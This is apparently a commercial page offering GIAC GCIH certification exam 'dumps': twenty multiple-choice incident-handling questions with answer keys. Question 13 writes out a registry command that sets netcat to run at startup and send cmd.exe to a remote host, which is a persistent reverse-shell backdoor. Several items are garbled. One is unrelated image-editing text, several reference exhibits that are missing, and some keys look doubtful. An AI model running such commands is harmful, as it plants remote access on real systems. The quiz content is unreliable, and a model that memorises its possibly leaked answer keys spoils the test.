GCIH Premium Bundle

GIAC Certified Incident Handler Certification Exam

Rating: 4.5 (54645 ratings)
328 Questions (Practice Tests)
328 PDF (Print version)
Last update: November 23, 2024

GIAC GCIH Free Practice Questions

Want to know Actualtests GCIH Exam practice test features? Want to learn more about the GIAC Certified Incident Handler certification experience? Study high-value GIAC GCIH answers to far-out GCIH questions at Actualtests. Get success with an absolute guarantee to pass the GIAC GCIH (GIAC Certified Incident Handler) test on your first attempt.

Online GIAC GCIH free dumps demo Below:

NEW QUESTION 1
Which of the following is used by attackers to obtain an authenticated connection on a network?

  • A. Denial-of-Service (DoS) attack
  • B. Replay attack
  • C. Man-in-the-middle attack
  • D. Back door

Answer: B

NEW QUESTION 2
Smoothing and decreasing contrast by averaging the pixels of the area where significant color transitions occur.


Solution:


Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 3
Brutus is a password cracking tool that can be used to crack the following authentications:
  • HTTP (Basic Authentication)
  • HTTP (HTML Form/CGI)
  • POP3 (Post Office Protocol v3)
  • FTP (File Transfer Protocol)
  • SMB (Server Message Block)
  • Telnet
Which of the following attacks can be performed by Brutus for password cracking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Hybrid attack
  • B. Replay attack
  • C. Dictionary attack
  • D. Brute force attack
  • E. Man-in-the-middle attack

Answer: ACD

NEW QUESTION 4
Choose the items from the given list that are required to be in the response kit of an Incident Handler.
GCIH dumps exhibit


Solution:
GCIH dumps exhibit

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 5
Which of the following languages are vulnerable to a buffer overflow attack?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Java
  • B. C++
  • C. C
  • D. Action script

Answer: BC

NEW QUESTION 6
Rick works as a Professional Ethical Hacker for Exambible Inc. The company has opened a new branch that uses Windows-based computers. Rick has been assigned a project to check the network security of the new branch office. He wants to ensure that the company is free from remote hacking attacks.
Choose the appropriate steps that Rick should perform to accomplish the task.
GCIH dumps exhibit


Solution:
GCIH dumps exhibit

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 7
Which of the following are used to identify who is responsible for responding to an incident?

  • A. Disaster management policies
  • B. Incident response manuals
  • C. Disaster management manuals
  • D. Incident response policies

Answer: D

NEW QUESTION 8
Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?

  • A. Hypervisor rootkit
  • B. Boot loader rootkit
  • C. Kernel level rootkit
  • D. Library rootkit

Answer: C

NEW QUESTION 9
Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?

  • A. Syn flood
  • B. Ping storm
  • C. Smurf attack
  • D. DDOS

Answer: D

NEW QUESTION 10
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

  • A. Kernel keylogger
  • B. Software keylogger
  • C. Hardware keylogger
  • D. OS keylogger

Answer: C

NEW QUESTION 11
Which of the following is a version of netcat with integrated transport encryption capabilities?

  • A. Encat
  • B. Nikto
  • C. Socat
  • D. Cryptcat

Answer: D

NEW QUESTION 12
A user is sending a large number of protocol packets to a network in order to saturate its resources and to disrupt connections to prevent communications between services. Which type of attack is this?

  • A. Vulnerability attack
  • B. Impersonation attack
  • C. Social Engineering attack
  • D. Denial-of-Service attack

Answer: D

NEW QUESTION 13
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want to set the Netcat to execute command any time.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.

Answer: BCD

NEW QUESTION 14
You are the Administrator for a corporate network. You are concerned about denial of service attacks.
Which of the following would be the most help against Denial of Service (DOS) attacks?

  • A. Packet filtering firewall
  • B. Network surveys.
  • C. Honey pot
  • D. Stateful Packet Inspection (SPI) firewall

Answer: D

NEW QUESTION 15
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.

  • A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3 errors.
  • B. Move the WebStore1 server to the internal network.
  • C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
  • D. Move the computer account of WebStore1 to the Remote organizational unit (OU).

Answer: AC

NEW QUESTION 16
Adam works as a Security Analyst for Umbrella Inc. The company has a Windows-based network. All computers run Windows XP. The manager of the Sales department complains to Adam about the unusual behavior of his computer. He tells Adam that some pornographic content suddenly appeared on his computer overnight. Adam suspects that some malicious software or Trojans have been installed on the computer. He runs some diagnostic programs and port scanners and finds that ports 12345, 12346, and 20034 are open. Adam also notices some tampering with the Windows registry, which causes one application to run every time Windows starts.
Which of the following is the most likely reason behind this issue?

  • A. Cheops-ng is installed on the computer.
  • B. Elsave is installed on the computer.
  • C. NetBus is installed on the computer.
  • D. NetStumbler is installed on the computer.

Answer: C

NEW QUESTION 17
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.
How was security compromised and how did the firewall respond?

  • A. The attack was social engineering and the firewall did not detect it.
  • B. Security was not compromised as the webpage was hosted internally.
  • C. The attack was Cross Site Scripting and the firewall blocked it.
  • D. Security was compromised as keylogger is invisible for firewall.

Answer: A

NEW QUESTION 18
Which of the following is the method of hiding data within another media type such as graphic or document?

  • A. Spoofing
  • B. Steganography
  • C. Packet sniffing
  • D. Cryptanalysis

Answer: B

NEW QUESTION 19
Which of the following statements about Denial-of-Service (DoS) attack are true?
Each correct answer represents a complete solution. Choose three.

  • A. It disrupts services to a specific computer.
  • B. It changes the configuration of the TCP/IP protocol.
  • C. It saturates network resources.
  • D. It disrupts connections between two computers, preventing communications between services.

Answer: ACD

NEW QUESTION 20
Which of the following types of attacks slows down or stops a server by overloading it with requests?

  • A. DoS attack
  • B. Impersonation attack
  • C. Network attack
  • D. Vulnerability attack

Answer: A
